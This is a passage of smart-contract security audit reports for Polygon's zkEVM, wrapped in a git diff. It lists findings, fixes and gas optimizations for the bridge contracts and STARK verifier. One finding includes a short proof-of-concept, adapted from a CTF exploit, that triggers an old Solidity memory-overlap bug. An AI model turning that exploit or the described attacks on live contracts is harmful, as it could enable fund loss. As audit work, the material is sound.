field. • Example: Let p be the order of the larger bn128 scalar field, and let q be the order of the goldilocks field. Note p > q as the bn128 field is much larger than the goldilocks field. Define integers a and b and consider expressions a · q + b and b. Then, aq + b ≡ b (mod q) yet a · q + b 6= b as integers. If oldBatchNum is b − 1 and newBatchNum is a · q + b, then the comparison above would return true and despite the batch numbers not being adjacent. The prover could convince a verifier that they have done a · q + 1 iterations of work by using a valid final proof of an execution from b − 1 to b. • Concern Addressed: The Polygon team stated that in final.verifier.circom they do a bit composition of oldBatchNum and newBatchNum into 63 bits. Since 263 < q (the order of the goldilocks field), and overflow in the comparison logic cannot occur. Minor completeness issue by rejecting the point-at-infinity during on-curve checks (Informational) Valid points on the curve bn128 either satisfy the curve equation or are the point at infinity. In the precompiled contracts (EIP196), (0,0) is the encoding of the point-at-infinity. The check checkPointBelongsToBN128Curve function re- turns true only if the point satisfies the curve equation; it rejects the point-at-infinity. There exists valid scenarios where a prover message is identical to the point-at-infinity. • Suggestion: Add the point-at-infinity check to the on-curve check. • Concern Addressed: The Polygon team would like to avoid adding the on-curve check for the point-at-infinity. We have confirmed that due to the random blinding factors and random verifier challenges in the protocol, completeness would only be an issue with negligible probability for an honest prover. 7 +4.2.3 STARK Prover and Verifier We checked the implementation of the STARK prover and verifier and generation of the starkinfo object from the parsed PIL object. We verify that the STARK prover follows the design of the reviewed eSTARK protocol, in particular, the implementation of the newly added lookup, multiset equality, and connection arguments. Misuse of Poseidon hashing for verifier challenges (Minor) We repeat the issue raised during the cryptog- raphy review above. It is represented in transcript (lines 16-20). The suggestion and addressed concern are the same. Unnecessary inclusion of all committed polynomials in FRI polynomial (Optimization) When the prover computes the FRI polynomial in starkinfo_fri_prover (lines 12-19), all committed polynomials are included in the linear combination. All committed polynomials that are involved in constraints will already be included in the linear combination as part of the proof for their correct evaluation, which will attest to the degree bound for the committed polynomial. Thus, the only benefit of adding all committed polynomials to the linear combination is to include a degree bound check for polynomials that are not part of any constraints. • Suggestion: Committed polynomials can be removed from the linear combination computing the FRI polyno- mial. If for some reason it is important to check the degree bound of some committed polynomial that is not included in any constraints, then at the very least, all committed polynomials that are a part of constraints do not need to be included a second time. Unnecessary evaluation of vanishing polynomial in verifier (Optimization) The verifier evaluates the van- ishing polynomial of G on g · z where g is the generator of G and z is the verifier evaluation challenge. However, this evaluation is not needed for verification. The evaluation is in stark_verify (line 70). • Suggestion: Remove this evaluation. 8 diff --git a/findings_newupdate/spearbit/zkEVM-bridge-Spearbit-27-March.txt b/findings_newupdate/spearbit/zkEVM-bridge-Spearbit-27-March.txt new file mode 100644 index 0000000..2feade2 --- /dev/null +++ b/findings_newupdate/spearbit/zkEVM-bridge-Spearbit-27-March.txt @@ -0,0 +1,73 @@ +6.3.3 L2 deployment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 +6.3.4 Findings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 2 1 About Spearbit Spearbit is a decentralized network of expert security engineers offering reviews and other security related services to Web3 projects with the goal of creating a stronger ecosystem. Our network has experience on every part of the blockchain technology stack, including but not limited to protocol design, smart contracts and the Solidity compiler. Spearbit brings in untapped security talent by enabling expert freelance auditors seeking flexibility to work on interesting projects together. Learn more about us at spearbit.com 2 Introduction Smart contract implementation which will be used by the Polygon-Hermez zkEVM. Disclaimer : This security review does not guarantee against a hack. It is a snapshot in time of zkEVM-Contracts according to the specific commit. Any modifications to the code will require a new security review. 3 Risk classification Severity level Likelihood: high Likelihood: medium High Likelihood: low Medium Impact: High Impact: Medium Impact: Low Critical High Medium Low Medium Low Low 3.1 Impact • High - leads to a loss of a significant portion (>10%) of assets in the protocol, or significant harm to a majority of users. • Medium - global losses <10% or losses to only a subset of users, but still unacceptable. • Low - losses will be annoying but bearable--applies to things like griefing attacks that can be easily repaired or even gas inefficiencies. 3.2 Likelihood • High - almost certain to happen, easy to perform, or not easy but highly incentivized • Medium - only conditionally possible or incentivized, but still relatively likely • Low - requires stars to align, or little-to-no incentive 3.3 Action required for severity levels • Critical - Must fix as soon as possible (if already deployed) • High - Must fix (before deployment if not already deployed) • Medium - Should fix • Low - Could fix 4 Executive Summary Over the course of 13 days in total, Polygon engaged with Spearbit to review the zkevm-contracts protocol. In this period of time a total of 68 issues were found. 3 Summary Project Name Polygon Repository Commit zkevm-contracts 5de59e...f899 Type of Project Cross Chain, Bridge Audit Timeline Jan 9 - Jan 25 Two week fix period Jan 25 - Feb 8 Severity Critical Risk High Risk Medium Risk Low Risk Gas Optimizations Informational Total Issues Found Count Fixed Acknowledged 0 0 3 16 19 30 68 0 0 3 10 18 19 50 0 0 0 6 1 11 18 4 5 Findings 5.1 Medium Risk +5.1.1 Funds can be sent to a non existing destination Severity: Medium Risk Context: PolygonZkEVMBridge.sol#L129-L257 Description: The function bridgeAsset() and bridgeMessage() do check that the destination network is different If accidentally the wrong than the current network. However, they don’t check if the destination network exists. networkId is given as a parameter, then the function is sent to a nonexisting network. If the network would be deployed in the future the funds would be recovered. However, in the meantime they are inaccessible and thus lost for the sender and recipient. Note: other bridges usually have validity checks on the destination. function bridgeAsset(...) ... { require(destinationNetwork != networkID, ... ); ... } function bridgeMessage(...) ... { require(destinationNetwork != networkID, ... ); ... } Recommendation: Check the destination networkID is a valid destination. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. +5.1.2 Fee on transfer tokens Severity: Medium Risk Context: PolygonZkEVMBridge.sol#L171 Description: The bridge contract will not work properly with a fee on transfer tokens 1. User A bridges a fee on transfer Token A from Mainnet to Rollover R1 for amount X. 2. In that case X-fees will be received by bridge contract on Mainnet but the deposit receipt of the full amount X will be stored in Merkle. 3. The amount is claimed in R1 and a new TokenPair for Token A is generated and the full amount X is minted to User A 4. Now the full amount is bridged back again to Mainnet 5. When a claim is made on Mainnet then the contract tries to transfer amount X but since it received the amount X-fees it will use the amount from other users, which eventually causes DOS for other users using the same token Recommendation: Use the exact amount which is transferred to the contract which can be obtained using below sample code 5 uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(address(this)); IERC20Upgradeable(token).safeTransferFrom(address(msg.sender), address(this), amount); uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(address(this)); uint256 transferedAmount = balanceAfter - balanceBefore; // if you dont want to support fee on transfer token use below: require (transferedAmount == amount, ...); // use transferedAmount if you want to support fee on transfer token Polygon-Hermez: Solved in PR 87. To protect against reentrancy with erc777 tokens, a check for reentrancy MUST be added. Solved in PR 91. Spearbit: Verified. +5.1.3 Function consolidatePendingState() can be executed during emergency state Severity: Medium Risk Context: PolygonZkEVM.sol#L783-L793 Description: The function consolidatePendingState() can be executed by everyone even when the contract is in an emergency state. This might interfere with cleaning up the emergency. Most other functions are disallowed during an emergency state. function consolidatePendingState(uint64 pendingStateNum) public { if (msg.sender != trustedAggregator) { require(isPendingStateConsolidable(pendingStateNum),...); } _consolidatePendingState(pendingStateNum); } Recommendation: Consider adding the following, which also improves consistency function consolidatePendingState(uint64 pendingStateNum) public { if (msg.sender != trustedAggregator) { require(!isEmergencyState,...); require(isPendingStateConsolidable(pendingStateNum),...); } _consolidatePendingState(pendingStateNum); + } Polygon-Hermez: Solved in PR 87. Spearbit: Verified. 6 5.2 Low Risk +5.2.1 Sequencers can re-order forced and non-forced batches Severity: Low Risk Context: PolygonZkEVM.sol#L409-L533 Description: Sequencers have a certain degree of control over how non-forced and forced batches are ordered. Consider the case where we have two sets of batches; non-forced (NF) and forced (F). A sequencer can order the following sets of batches (F1, F2) and (NF1, NF2) in any order so as long as the order of the forced batch and non-forced batch sets are kept in order. i.e. A sequencer can sequence batches as F1 -> NF1 -> NF2 -> F2 but they can also equivalently sequence these same batches as NF1 -> F1 -> F2 -> NF2. Recommendation: Ensure this behavior is understood and consider what impact decentralizing the sequencer role would have on bridge users. Polygon-Hermez: Added comments to function forceBatch() in PR 85. Spearbit: Acknowledged. +5.2.2 Check length of smtProof Severity: Low Risk Context: DepositContract.sol#L90-L112 Description: An obscure Solidity bug could be triggered via a call in solidity 0.4.x. Current solidity versions revert with panic 0x41. The problem could occur if unbounded memory arrays were used. This situation happens to be the case as verifyMerkleProof() (and all the functions that call it) don’t check the length of the array (or loop over the entire array). It also depends on memory variables (for example structs) being used in the functions, that doesn’t seem to be the case. Here is a POC of the issue which can be run in remix // SPDX-License-Identifier: MIT // based on https://github.com/paradigm-operations/paradigm-ctf-2021/blob/master/swap/private/Exploit.sol ,→ pragma solidity ^0.4.24; // only works with low solidity version import "hardhat/console.sol"; contract test{ struct Overlap { uint field0; } function mint(uint[] memory amounts) public { Overlap memory v; console.log("before: ",amounts[0]); v.field0 = 567; console.log("after: ",amounts[0]); // would expect to be 0 however is 567 } function go() public { // this part requires the low solidity version bytes memory payload = abi.encodeWithSelector(this.mint.selector, 0x20, 2**251); bool success = address(this).call(payload); console.log(success); } } Recommendation: Although it currently isn’t exploitable, to be sure consider adding a check on the length of smtProof; 7 function verifyMerkleProof..., bytes32[] memory smtProof, ...) public pure returns (bool) { + require (smtProof.length == _DEPOSIT_CONTRACT_TREE_DEPTH); ... } Or use a fixed-size array. function verifyMerkleProof(..., bytes32[_DEPOSIT_CONTRACT_TREE_DEPTH] memory smtProof,... ) ... { } Polygon-Hermez: Solved in PR 85. Spearbit: Verified. +5.2.3 Transaction delay due to free claimAsset() transactions Severity: Low Risk Context: batchbuilder.go#L29-L122 Description: The sequencer first processes the free claimAsset() transaction and then the rest. This might delay other transactions if there are many free claimAsset() transactions. As these transactions would have to be initiated on the mainnet, the gas costs there will reduce this problem. However, once multiple rollups are supported in the future the transactions could originate from another rollup with low gas costs. func (s *Sequencer) tryToProcessTx(ctx context.Context, ticker *time.Ticker) { ... appendedClaimsTxsAmount := s.appendPendingTxs(ctx, true, 0, getTxsLimit, ticker) // `claimAsset()` transactions ,→ appendedTxsAmount := s.appendPendingTxs(ctx, false, minGasPrice.Uint64(), getTxsLimit-appendedClaimsTxsAmount, ticker) + appendedClaimsTxsAmount ,→ ... } Recommendation: Consider adding a limited amount of free claimAsset() transactions to a batch. Polygon-Hermez: This is important to consider once multiple rollups are implemented. For now, we’ll let it be like this. Spearbit: Acknowledged. +5.2.4 Misleading token addresses Severity: Low Risk Context: PolygonZkEVMBridge.sol#L272-L373 Description: The function claimAsset() deploys TokenWrapped contracts via create2 and a salt. This salt is based on the originTokenAddress. By crafting specific originTokenAddresses, it’s possible to create vanity addresses on the other chain. These addresses could be similar to legitimate tokens and might mislead users. Note: it is also possible to directly deploy tokens on the other chain with vanity addresses (e.g. without using the bridge) function claimAsset(...) ... { ... bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress)); ... TokenWrapped newWrappedToken = (new TokenWrapped){ salt: tokenInfoHash }(name, symbol, decimals); ... } 8 Recommendation: Have a way for users to determine legitimate bridged tokens, for example via tokenlists. Polygon-Hermez: Our front end will show a list of supported tokens, and the users will be able also to import custom tokens too ( the same way it happens in a lot of DEXs). But we cannot control of course the use of all the dapps deployed. Dapps that integrate with our system should be able to import our token list or calculate them. There are view functions to help calculate an L2 address pre- calculatedWrapperAddress given a mainnet token address and metadata. Also easily a user/dapp can check the corresponding L1 token address of every token of L2 calling wrappedTokenToTokenInfo and checking originTo- kenAddress is in their Mainnet token list for example. Our front end will show a list of supported tokens, the users will be able also to import custom tokens too ( the same way it happens in a lot of DEXs). But we cannot control of course the use of all the dapps deployed. Dapps that integrate with our system should be able to import our token list or calculate them. There’s view functions to help calculate a L2 address precalculatedWrapperAddress given a mainnet token address and metadata. Also easily a user/dapp can check the corresponding L1 token address of every token of L2 calling wrappedTokenToTokenInfo and checking originTokenAddress is in their Mainnet token list for example. Spearbit: Acknowledged. +5.2.5 Limit amount of gas for free claimAsset() transactions Severity: Low Risk Context: PolygonZkEVMBridge.sol#L272-L436 Description: Function claimAsset() is subsidized (e.g. gasprice is 0) on L2 and allows calling a custom contract. This could be misused to execute elaborate transactions for free. Note: safeTransfer could also call a custom contract that has been crafted before and bridged to L1. Note: this is implemented in the Go code, which detects transactions to the bridge with function bridgeClaimMethodSignature == "0x7b6323c1", which is the selector of claimAsset(). See function IsClaimTx() in transaction.go. function claimAsset(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}(new bytes(0)); ... IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress,amount); ... } Recommendation: Limit the amount of gas supplied to claimAsset() while doing free transactions. Note: A PR is being made to limit the available gas: PR 1551. Polygon-Hermez: We will take this into consideration in the current and future implementation of the sequencer. Spearbit: Acknowledged. +5.2.6 What to do with funds that can’t be delivered Severity: Low Risk Context: PolygonZkEVMBridge.sol#L272-L436 Description: Both claimAsset() and claimMessage() might revert on different locations (even after retrying). Although the funds stay in the bridge, they are not accessible by the originator or recipient of the bridge action. So they are essentially lost for the originator and recipient. Some other bridges have recovery addresses where the funds can be delivered instead. Here are several potential revert situations: 9 function claimAsset(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}(new bytes(0)); require(success, ... ); ... IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress,amount); ... TokenWrapped newWrappedToken = (new TokenWrapped){ salt: tokenInfoHash }(name, symbol, decimals); ... } function claimMessage(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, "PolygonZkEVMBridge::claimMessage: Message failed"); ... } Recommendation: Consider having a recovery mechanism for funds that can’t be delivered. For example, the funds could be delivered to an EOA recovery address on a destination chain. This requires adding more info in the merkle root and also needs to check those senders add a recovery address, otherwise, there isn’t always a recovery address. It could be implemented via a function (e.g. recoverAsset()) where the recovery address initiates a transaction (similar to claimAsset() ) and the funds are delivered to the recovery address. Polygon-Hermez: We decided that such a mechanism is not worth implementing since the user can also put an invalid recoverAddress and it adds too much overhead. If the user put an invalid address as a destination address, either if it was mistaken or puts a smart contract that cannot receive funds, the funds will be lost. Spearbit: Acknowledged. +5.2.7 Inheritance structure does not openly support contract upgrades Severity: Low Risk Context: PolygonZkEVMBridge.sol#L18-L21 Description: The solidity compiler uses C3 linearisation to determine the order of contract inheritance. This is performed as left to right of all child contracts before considering the parent contract. Storage slot assignment PolygonZkEVMBridge is as follows: Initializable -> DepositContract -> EmergencyManager -> The Initializable.sol already reserves storage slots for future upgrades and because PolygonZkEVM- Bridge.sol is inherited last, storage slots can be safely appended. However, the two intermediate contracts, DepositContract.sol and EmergencyManager.sol, cannot handle storage upgrades. Recommendation: Consider introducing a storage gap to the two intermediate contracts. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 10 +5.2.8 Function calculateRewardPerBatch() could divide by 0 Severity: Low Risk Context: PolygonZkEVM.sol#L1488-L1498 Description: The function calculateRewardPerBatch() does a division by totalBatchesToVerify. If there are currently no batches to verify, then totalBatchesToVerify would be 0 and the transaction would revert. When calculateRewardPerBatch() is called from _verifyBatches() this doesn’t happen as it will revert earlier. However when the function is called externally this situation could occur. function calculateRewardPerBatch() public view returns (uint256) { ... uint256 totalBatchesToVerify = ((lastForceBatch - lastForceBatchSequenced) + lastBatchSequenced) - getLastVerifiedBatch(); return currentBalance / totalBatchesToVerify; ,→ } Recommendation: Consider changing the code to something like function calculateRewardPerBatch() public view returns (uint256) { ... uint256 totalBatchesToVerify = ((lastForceBatch - lastForceBatchSequenced) + lastBatchSequenced) - getLastVerifiedBatch(); ,→ if (totalBatchesToVerify == 0) return 0; return currentBalance / totalBatchesToVerify; + } Polygon-Hermez: Solved in PR 88. Spearbit: Verified. +5.2.9 Limit gas usage of _updateBatchFee() Severity: Low Risk Context: PolygonZkEVM.sol#L839-L908 Description: The function _updateBatchFee() loops through all unverified batches. Normally this would be 30 min/5 min ~ 6 batches. Assume the aggregator malfunctions and after one week, verifyBatches() is called, which calls _updateBatch- Fee(). Then there could be 7 * 24 * 60 min/ 5 min ~ 2352 batches. The function verifyBatches() limits this to MAX_VERIFY_BATCHES == 1000. This might result in an out-of-gas error. This would possibly require multiple verifyBatches() tries with a smaller number of batches, which would increase network outage. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... while (currentBatch != currentLastVerifiedBatch) { ... if (block.timestamp - currentSequencedBatchData.sequencedTimestamp >veryBatchTimeTarget) { ... } ... } ... } Recommendation: Optimize the function _updateBatchFee() and/or check the available amount of gas and simplify the algorithm to update the batchFee. 11 As suggested by the project, the following optimization below could be made. This will alleviate the problem because only a limited amount of batches will be below target. The bulk will be above target, but they won’t be looped over. // Check if timestamp is above or below the VERIFY_BATCH_TIME_TARGET if ( block.timestamp - currentSequencedBatchData.sequencedTimestamp < // Notice the changed < veryBatchTimeTarget ) { totalBatchesBelowTarget += // Notice now it's Below currentBatch - currentSequencedBatchData.previousLastBatchSequenced; } else { break; // Since the rest of batches will be above! ^^ } Polygon-Hermez: Solved in PR 90. Spearbit: Verified. +5.2.10 Keep precision in _updateBatchFee() Severity: Low Risk Context: PolygonZkEVM.sol#L839-L908 Description: Function _updateBatchFee() uses a trick to prevent losing precision in the calculation of accDivi- sor. The value accDivisor includes an extra multiplication with batchFee, which is undone when doing batchFee = (batchFee * batchFee) / accDivisor because this also contains an extra multiplication by batchFee. However, if batchFee happens to reach a small value (also see issue Minimum and maximum value for batch- Fee) then the trick doesn’t work that well. In the extreme case of batchFee ==0 then a division by 0 will take place, resulting in a revert. Luckily this doesn’t happen in practice. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); batchFee = (batchFee * batchFee) / accDivisor; ... ,→ } Recommendation: Replace the multiplication factor with a fixed and sufficiently large value. For example in the following way: function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); batchFee = (batchFee * batchFee) / accDivisor; uint256 accDivisor = (1E18 * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); batchFee = (1E18 * batchFee) / accDivisor; ... - ,→ - + ,→ + } Polygon-Hermez: Solved in PR 90. Spearbit: Verified. 12 +5.2.11 Minimum and maximum value for batchFee Severity: Low Risk Context: PolygonZkEVM.sol#L839-L908 Description: Function _updateBatchFee() updates the batchFee depending on the batch time target. If the batch times are repeatedly below or above the target, the batchFee could shrink or grow unlimited. If the batchFee would get too low, problems with the economic incentives might arise. If the batchFee would get too high, overflows might occur. Also, the fee might too be high to be practically payable. Although not very likely to occur in practice, it is probably worth the trouble to implement limits. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... if (totalBatchesBelowTarget < totalBatchesAboveTarget) { ... batchFee = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * ,→ 3)); } else { ... uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); ,→ batchFee = (batchFee * batchFee) / accDivisor; } } Recommendation: Consider implementing a minimum and maximum value for batchFee. Polygon-Hermez: Solved in PR 90. Spearbit: Verified. +5.2.12 Bridge deployment will fail if initialize() is front-run Severity: Low Risk Context: deployContracts.js By default, Hardhat will deploy transparent upgradeable proxies when calling up- Description: grades.deployProxy() with no type specified. This function accepts data which is used to initialize the state of the contract being deployed. However, because the zkEVM bridge script utilizes the output of each contract address on deployment, it is not trivial to atomically deploy and initialize contracts. As a result, there is a small time window available for attackers to front-run calls to initialize the necessary bridge contracts, allowing them to temporarily DoS during the deployment process. Recommendation: Consider pre-calculating all contract addresses prior to proxy deployment so each contract can be initialized atomically. Polygon-Hermez: We are currently deciding the best way to make a deterministic deployment for the bridge but will take this in account for sure. Spearbit: Acknowledged. 13 +5.2.13 Add input validation for the setVeryBatchTimeTarget method Severity: Low Risk Context: PolygonZkEVM.sol#L1171-L1176 Description: The setVeryBatchTimeTarget method in PolygonZkEVM accepts a uint64 newVeryBatchTimeTar- get argument to set the veryBatchTimeTarget. This variable has a value of 30 minutes in the initialize method, so it is expected that it shouldn’t hold a very big value as it is compared to timestamps difference in _updateBatchFee. Since there is no upper bound for the value of the newVeryBatchTimeTarget argument, it is possible (for example due to fat-fingering the call) that an admin passes a big value (up to type(uint64).max) which will result in wrong calculation in _updateBatchFee. Recommendation: Add a sensible upper bound for the value of newVeryBatchTimeTarget, for example, 1 day. Polygon-Hermez: Solved in PR 88. Spearbit: Verified. +5.2.14 Single-step process for critical ownership transfer Severity: Low Risk Context: PolygonZkEVM.sol#L1182, OwnableUpgradeable.sol#L74 Description: If the nominated newAdmin or newOwner account is not a valid account, the owner or admin risks locking themselves out. function setAdmin(address newAdmin) public onlyAdmin { admin = newAdmin; emit SetAdmin(newAdmin); } function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } Recommendation: Consider implementing a two-step process where the owner or admin nominates an account, and the nominated account calls an acceptTransfer() function for the transfer to succeed. Polygon-Hermez: Solved for Admin in PR 87. The owner is intended to be a multisig in a bootstrap period, and afterward will be renounced. We consider acceptTransfer() to be an overkill for this address. Spearbit: Verified and Acknowledged. +5.2.15 Ensure no native asset value is sent in payable method that can handle ERC20 transfers as well Severity: Low Risk Context: PolygonZkEVMBridge.sol#L154-L187 Description: The bridgeAsset method of PolygonZkEVMBridge is marked payable as it can work both with the native asset as well as with ERC20 tokens. In the codepath where it is checked that the token is not the native asset but an ERC20 token, it is not validated that the user did not actually provide value to the transaction. The likelihood of this happening is pretty low since it requires a user error but if it does happen then the native asset value will be stuck in the PolygonZkEVMBridge contract. Recommendation: Ensure that no native asset value is sent when the bridged asset is an ERC20 token by adding the following code to the codepath of the ERC20 bridging: require(msg.value == 0, "PolygonZkEVMBridge::bridgeAsset: Expected zero native asset value when bridging ERC20 tokens"); ,→ 14 You can also use an if statement and a custom error instead of a require statement. Polygon-Hermez: Solved in PR 87. Spearbit: Verified. +5.2.16 Calls to the name, symbol and decimals functions will be unsafe for non-standard ERC20 tokens Severity: Low Risk Context: PolygonZkEVMBridge.sol#L181-185 Description: The bridgeAsset method of PolygonZkEVMBridge accepts an address token argument and later calls the name, symbol and decimals methods of it. There are two potential problems with this: 1. Those methods are not mandatory in the ERC20 standard, so there can be ERC20-compliant tokens that do not have either or all of the name, symbol or decimals methods, so they will not be usable with the protocol, because the calls will revert 2. There are tokens that use bytes32 instead of string as the value type of their name and symbol storage vari- ables and their getter functions (example is MKR). This can cause reverts when trying to consume metadata from those tokens. Also, see weird-erc20 for nonstandard tokens. Recommendation: For the first problem, a simple solution is to use a low-level staticcall for those method calls and if they are unsuccessful to use some default values. For the second problem it would be best to again do a low-level staticcall and then use an external library that checks if the returned data is of type string and if not to cast it to such. Also, see MasterChefJoeV3 as an example for a possible solution. Polygon-Hermez: Solved in PR 90 and PR 91. Spearbit: Verified. 5.3 Gas Optimization +5.3.1 Use calldata instead of memory for array parameters Severity: Gas Optimization Context: PolygonZkEVMBridge.sol#L272-L373, PolygonZkEVMBridge.sol#L520-L581, DepositContract.sol#L90- L112 Description: The code frequently uses memory arrays for externally called functions. Some gas could be saved by making these calldata. The calldata can also be cascaded to internal functions that are called from the external functions. function claimAsset(bytes32[] memory smtProof) public { ... _verifyLeaf(smtProof); ... } function _verifyLeaf(bytes32[] memory smtProof) internal { ... verifyMerkleProof(smtProof); ... } function verifyMerkleProof(..., bytes32[] memory smtProof, ...) internal { ... } Recommendation: Consider changing the code to 15 -function claimAsset(bytes32[] memory smtProof) public { +function claimAsset(bytes32[] calldata smtProof) public { ... _verifyLeaf(smtProof); ... } -function _verifyLeaf(bytes32[] memory smtProof) internal { +function _verifyLeaf(bytes32[] calldata smtProof) internal { ... verifyMerkleProof(smtProof); ... } -function verifyMerkleProof(..., bytes32[] memory smtProof, ...) internal { +function verifyMerkleProof(..., bytes32[] calldata smtProof, ...) internal { ... } Polygon-Hermez: Solved in PR 85. Spearbit: Verified. +5.3.2 Optimize networkID == MAINNET_NETWORK_ID Severity: Gas Optimization Context: PolygonZkEVMBridge.sol#L520-L581, PolygonZkEVMBridge.sol#L69-L77 Description: The value for networkID is defined in initialize() and MAINNET_NETWORK_ID is constant. So networkID == MAINNET_NETWORK_ID can be calculated in initialize() and stored to save some gas. It is even cheaper if networkID is immutable, which would require adding a constructor. uint32 public constant MAINNET_NETWORK_ID = 0; uint32 public networkID; function initialize(uint32 _networkID, ...) public virtual initializer { networkID = _networkID; ... } function _verifyLeaf(...) ... { ... if (networkID == MAINNET_NETWORK_ID) { ... } else { ... } } Recommendation: Consider calculating networkID == MAINNET_NETWORK_ID in initialize() or preferable a constructor. Polygon-Hermez: We decided to go for a deterministic deployment for the PolygonZkEVMBridge contract, there- fore we prefer to not use immutables in this contract. When implemented without immutable, the resulting code is less optimal. Spearbit: Acknowledged. 16 +5.3.3 Optimize updateExitRoot() Severity: Gas Optimization Context: PolygonZkEVMGlobalExitRoot.sol#L54-L75 Description: The function updateExitRoot() accesses the global variables lastMainnetExitRoot and las- tRollupExitRoot multiple times. This can be optimized using temporary variables. function updateExitRoot(bytes32 newRoot) external { ... if (msg.sender == rollupAddress) { lastRollupExitRoot = newRoot; } if (msg.sender == bridgeAddress) { lastMainnetExitRoot = newRoot; } bytes32 newGlobalExitRoot = keccak256( abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot) ); if ( ... ) { ... emit UpdateGlobalExitRoot(lastMainnetExitRoot, lastRollupExitRoot); } } Recommendation: Consider changing the code to something like function updateExitRoot(bytes32 newRoot) external { ... bytes32 cm = lastMainnetExitRoot; bytes32 cr = lastRollupExitRoot; if (msg.sender == rollupAddress) { lastRollupExitRoot = cr = newRoot; } if (msg.sender == bridgeAddress) { lastMainnetExitRoot = cm = newRoot; } bytes32 newGlobalExitRoot = keccak256( abi.encodePacked(cm, cr) ); if ( ... ) { ... emit UpdateGlobalExitRoot(cm, cr); } } Polygon-Hermez: Solved in PR 82. Spearbit: Verified. +5.3.4 Optimize _setClaimed() Severity: Gas Optimization Context: PolygonZkEVMBridge.sol#L272-L436, PolygonZkEVMBridge.sol#L520-L581, PolygonZkEVMBridge.sol#L587- L605 Description: The function claimAsset() and claimMessage() first verify !isClaimed() (via the function _veri- fyLeaf()) and then do _setClaimed(). These two functions can be combined in a more efficient version. 17 function claimAsset(...) ... { _verifyLeaf(...); _setClaimed(index); ... } function claimMessage(...) ... { _verifyLeaf(...); _setClaimed(index); ... } function _verifyLeaf(...) ... { require( !isClaimed(index), ...); ... } function isClaimed(uint256 index) public view returns (bool) { uint256 claimedWordIndex = index / 256; uint256 claimedBitIndex = index % 256; uint256 claimedWord = claimedBitMap[claimedWordIndex]; uint256 mask = (1 << claimedBitIndex); return (claimedWord & mask) == mask; } function _setClaimed(uint256 index) private { uint256 claimedWordIndex = index / 256; uint256 claimedBitIndex = index % 256; claimedBitMap[claimedWordIndex] = claimedBitMap[claimedWordIndex] | (1 << claimedBitIndex); } Recommendation: The following suggestion is based on Uniswap permit2 bitmap: Replace the duo of isClaimed() and _setClaimed() with the following function _setAndCheckClaimed(). This could be either inside or outside of _verifyLeaf(). function _setAndCheckClaimed(uint256 index) private { (uint256 wordPos, uint256 bitPos) = _bitmapPositions(index); uint256 mask = 1 << bitPos; uint256 flipped = claimedBitMap[wordPos] ^= mask; require (flipped & mask != 0,"PolygonZkEVMBridge::_verifyLeaf: Already claimed"); } function _bitmapPositions(uint256 index) private pure returns (uint256 wordPos, uint256 bitPos) { wordPos = uint248(index >> 8); bitPos = uint8(index); } Note: update the error message, depending on whether it will be called inside or outside of _verifyLeaf() If the status of the bits has to be retrieved from the outside, add the following function: function isClaimed(uint256 index) external view returns (bool) { (uint256 wordPos, uint256 bitPos) = _bitmapPositions(index); uint256 mask = (1 << bitPos); return ( claimedBitMap[wordPos] & mask) == mask; } Polygon-Hermez: Solved in PR 82. Spearbit: Verified. 18 +5.3.5 SMT branch comparisons can be optimised Severity: Gas Optimization Context: DepositContract.sol#L99-L109, DepositContract.sol#L65-L77, DepositContract.sol#L30-L46 Description: When verifying a merkle proof, the search does not terminate until we have iterated through the tree depth to calculate the merkle root. The path is represented by the lower 32 bits of the index variable where each bit represents the direction of the path taken. Two changes can be made to the following snippet of code: • Bit shift currentIndex to the right instead of dividing by 2. • Avoid overwriting the currentIndex variable and perform the bitwise comparison in-line. function verifyMerkleProof( ... uint256 currrentIndex = index; for ( uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++ ) { } if ((currrentIndex & 1) == 1) node = keccak256(abi.encodePacked(smtProof[height], node)); else node = keccak256(abi.encodePacked(node, smtProof[height])); currrentIndex /= 2; Recommendation: Consider changing the code to function verifyMerkleProof( ... uint256 currrentIndex = index; for ( uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++ ) { if ((currrentIndex & 1) == 1) if (((index >> height) & 1) == 1) node = keccak256(abi.encodePacked(smtProof[height], node)); else node = keccak256(abi.encodePacked(node, smtProof[height])); currrentIndex /= 2; - + - } This same optimization can also be applied to similar instances found in _deposit() and getDepositRoot(). Polygon-Hermez: Solved in PR 88. Spearbit: Verified. 19 +5.3.6 Increments can be optimised by pre-fixing variable with ++ Severity: Gas Optimization Context: DepositContract.sol#L64 Description: There are small gas savings in performing when pre-fixing increments with ++. Sometimes this can be used to combine multiple statements, like in function _deposit(). function _deposit(bytes32 leafHash) internal { ... depositCount += 1; uint256 size = depositCount; ... } Other occurrences of ++: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: PolygonZkEVM.sol: 